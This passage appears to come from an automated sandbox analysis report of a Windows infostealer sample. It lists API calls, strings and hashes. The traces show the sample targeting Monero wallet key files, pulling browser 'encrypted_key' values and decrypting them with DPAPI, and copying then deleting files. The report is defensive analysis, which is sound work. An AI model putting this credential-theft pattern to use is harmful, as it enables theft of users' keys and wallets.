                              • Instruction Fuzzy Hash: 45118FB1A44205EFD724CF96DD8AF7BBBB8EB44B10F10426BF615A7280D77558088BE1
                              APIs
                              • StrStrA.SHLWAPI(007FE110,?,?,?,00C6140C,?,007FE110,00000000), ref: 00C6926C
                              • lstrcpyn.KERNEL32(00E9AB88,007FE110,007FE110,?,00C6140C,?,007FE110), ref: 00C69290
                              • lstrlen.KERNEL32(?,?,00C6140C,?,007FE110), ref: 00C692A7
                              • wsprintfA.USER32 ref: 00C692C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 0165195dfe05d98a8de49fdd3b2a80ca9966e0c6d393572e491927d86ef7770a
                              • Instruction ID: 343df05af107727d3ec6ef8998011e8979237cf4fcf000835395932723f1a0a4
                              • Opcode Fuzzy Hash: 0165195dfe05d98a8de49fdd3b2a80ca9966e0c6d393572e491927d86ef7770a
                              • Instruction Fuzzy Hash: F301E575500208FFCB04DFECC999EAE7BB9EF48350F188159F909AB200D631AA44DBD1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C512B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C512BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C512D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C512F5
                              • RegCloseKey.ADVAPI32(?), ref: 00C512FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 6d269c7fa7daf298ff4e21bbfb02279f6513e74fa69e05fe1505e49f5d3cd5b8
                              • Instruction ID: b4bf8e9839a11acba9cddd642ab6b93499cbe0cf57250a8d3353a47a29c9b7bf
                              • Opcode Fuzzy Hash: 6d269c7fa7daf298ff4e21bbfb02279f6513e74fa69e05fe1505e49f5d3cd5b8
                              • Instruction Fuzzy Hash: 3F0112B9A40208BFDB14DFD1DC4DFAEB7B8EF48701F048156FA05A7280D6709A058B91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C66663
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00C66726
                              • ExitProcess.KERNEL32 ref: 00C66755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C70E28,00000000,?), ref: 00C6882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C68836
                              • wsprintfA.USER32 ref: 00C68850
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C6951E,00000000), ref: 00C68D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C68D62
                              • wsprintfW.USER32 ref: 00C68D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C5A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00C5A3FF
                              • lstrlen.KERNEL32(00000000), ref: 00C5A6BC
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00C5A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C5D481
                              • lstrlen.KERNEL32(00000000), ref: 00C5D698
                              • lstrlen.KERNEL32(00000000), ref: 00C5D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00C5D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C5D801
                              • lstrlen.KERNEL32(00000000), ref: 00C5D99F
                              • lstrlen.KERNEL32(00000000), ref: 00C5D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00C5DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C71580,00C70D92), ref: 00C5F54C
                              • lstrlen.KERNEL32(00000000), ref: 00C5F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: f3af7c1a80edfc1efa85e8818d24599d7166a9872e4e36482b324f10e00abe13
                              • Instruction ID: daaab37eadb764457445e4412d7a491fbce87024eed9526bb13ae60541874a32
                              • Opcode Fuzzy Hash: f3af7c1a80edfc1efa85e8818d24599d7166a9872e4e36482b324f10e00abe13
                              • Instruction Fuzzy Hash: 37414CB1D10109AFCB24EFE5D885AEEB774BF58304F108029F41676291DB74AA09DFA2
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C59D39
                                • Part of subcall function 00C59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59AEF
                                • Part of subcall function 00C59AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C54EEE,00000000,?), ref: 00C59B01
                                • Part of subcall function 00C59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59B2A
                                • Part of subcall function 00C59AC0: LocalFree.KERNEL32(?,?,?,?,00C54EEE,00000000,?), ref: 00C59B3F
                                • Part of subcall function 00C59B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C59B84
                                • Part of subcall function 00C59B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C59BA3
                                • Part of subcall function 00C59B60: LocalFree.KERNEL32(?), ref: 00C59BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 5c6d70df82a5e154b7447581497c2418299f3243393bcc4bf66a3712753202db
                              • Instruction ID: 7b1677e23ca7c58b31ed20e3de7f0b4e074a7f14ed858cb769142bb251e9c393
                              • Opcode Fuzzy Hash: 5c6d70df82a5e154b7447581497c2418299f3243393bcc4bf66a3712753202db
                              • Instruction Fuzzy Hash: 6A315EB9D10208EBCB14DFE4DC85AEEB7B8EF48305F144559E915A3241E7309A48CBA5
                              APIs
                              • CreateFileA.KERNEL32(00C63AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C63AEE,?), ref: 00C692FC
                              • GetFileSizeEx.KERNEL32(000000FF,00C63AEE), ref: 00C69319
                              • CloseHandle.KERNEL32(000000FF), ref: 00C69327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 94a94fd780c9e4567437e9ae1181f331154b47527fbab4f4b05a17548949a740
                              • Instruction ID: 99704cef5a0cd746bf63c84b5837a3338a78540721af5fbcb3afe872319246e7
                              • Opcode Fuzzy Hash: 94a94fd780c9e4567437e9ae1181f331154b47527fbab4f4b05a17548949a740
                              • Instruction Fuzzy Hash: 97F03C75E40208BBDB20DBF2DC49B9E77B9EF48710F108266BA51A72D0D6B096058B80
                              APIs
                              • __getptd.LIBCMT ref: 00C6C74E
                                • Part of subcall function 00C6BF9F: __amsg_exit.LIBCMT ref: 00C6BFAF
                              • __getptd.LIBCMT ref: 00C6C765
                              • __amsg_exit.LIBCMT ref: 00C6C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00C6C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 79020f07f2fea1cc3b71d798e742dfd7f998fdaba9d80c9cb0963cd357a03a1a
                              • Instruction ID: 4c7e8641ea152ad6f84a36ed084c5d9e2799a4021d6d4fc33167238326fb2a4d
                              • Opcode Fuzzy Hash: 79020f07f2fea1cc3b71d798e742dfd7f998fdaba9d80c9cb0963cd357a03a1a
                              • Instruction Fuzzy Hash: C1F090329012009BD770BBF898C776E33A06F00720F204149F564E61D2DF645D81AF57
                              APIs
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C64F7A
                              • lstrcat.KERNEL32(?,00C71070), ref: 00C64F97
                              • lstrcat.KERNEL32(?,007F8F28), ref: 00C64FAB
                              • lstrcat.KERNEL32(?,00C71074), ref: 00C64FBD
                                • Part of subcall function 00C64910: wsprintfA.USER32 ref: 00C6492C
                                • Part of subcall function 00C64910: FindFirstFileA.KERNEL32(?,?), ref: 00C64943
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C70FDC), ref: 00C64971
                                • Part of subcall function 00C64910: StrCmpCA.SHLWAPI(?,00C70FE0), ref: 00C64987
                                • Part of subcall function 00C64910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C64B7D
                                • Part of subcall function 00C64910: FindClose.KERNEL32(000000FF), ref: 00C64B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
